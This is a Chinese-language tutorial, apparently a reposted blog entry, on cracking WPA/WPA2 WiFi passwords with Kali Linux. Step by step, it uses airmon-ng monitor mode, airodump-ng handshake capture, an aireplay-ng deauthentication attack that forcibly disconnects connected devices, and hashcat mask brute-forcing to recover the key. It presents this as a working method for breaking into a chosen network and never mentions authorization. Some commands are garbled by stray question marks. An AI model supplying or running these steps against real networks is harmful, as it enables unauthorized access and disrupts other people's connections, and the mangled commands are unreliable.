hashcat破解wifi密码(kali)
第一步 將網卡處于監聽狀態
airmon-ng check airmon-ng check kill // 關閉影響監聽狀態的進程 airmon-ng start wlan0第二步 掃描可用wifi
airodump-ng wlan0mon第三部 獲取wifi的握手包
airodump-ng -c (上一步掃描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目錄) wlan0mon注意:得到wifi的握手包需要有設備連接在該wifi下,原理是將該連接的設備提下線,該設備會重新連接,我們就可以獲得該設備連接wifi時所發送的握手包。
將該wifi下的設備強制踢下去
aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (強制踢下的設備的ssid) wlan0mon當右上角出現WPA handshake ****的時候說明獲取成功
第四部 破解密碼
- 使用aircrack-ng 破解,該方法需要字典,效率低并且成功率不高
- 使用hashcat來破解,可以使用字典也可以不使用字典(這里只講不適用字典的情況)
1 將握手包轉換成hccap格式
aircrack-ng *.cap -J wpahashcat2 進行破解
hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d-m 2500:代表破解WPA/WPA2
-a 3:使用掩碼暴力破解
wpahash.hccap: 為上一步轉換的hccap文件,若是提示“Old hccap format detected! You need to update”可以將第一步的命令改為
aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件后面的字符:
但如果我們不確定某一位到底是數字還是字母怎么寫組合呢?這時候就要用到高級組合:
比如設置?--custom-charset1=?l?d?那么就表示??1代表小寫字母與數字組合,那么8位隨機的數字與小寫字母組合可以寫成??1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0?--custom-charset1=?l?d??1?1?1?1?1?1?1?1
再比如設置?--custom-charset2=xiao106347?那么就表示??2?代表字符串由?x i a o 1 0 6 3?4 7?組成的所有可能組合,完整例子:
hashcat test.txt -a 3 -m 0?--custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2
注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force強制運行
? ? ? ? ? 2、如果是使用虛擬機運行可能會出現“Device #1: This device's constant buffer size is too small.
Device #1: This device's local mem size is too small”此時將虛擬機的處理器改為單核處理器
總結
以上是生活随笔為你收集整理的hashcat破解wifi密码(kali)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 腾讯投资未来智安,企业为什么要使用ssl
- 下一篇: 《万里长江图》告诉我们:金沙江是长江的正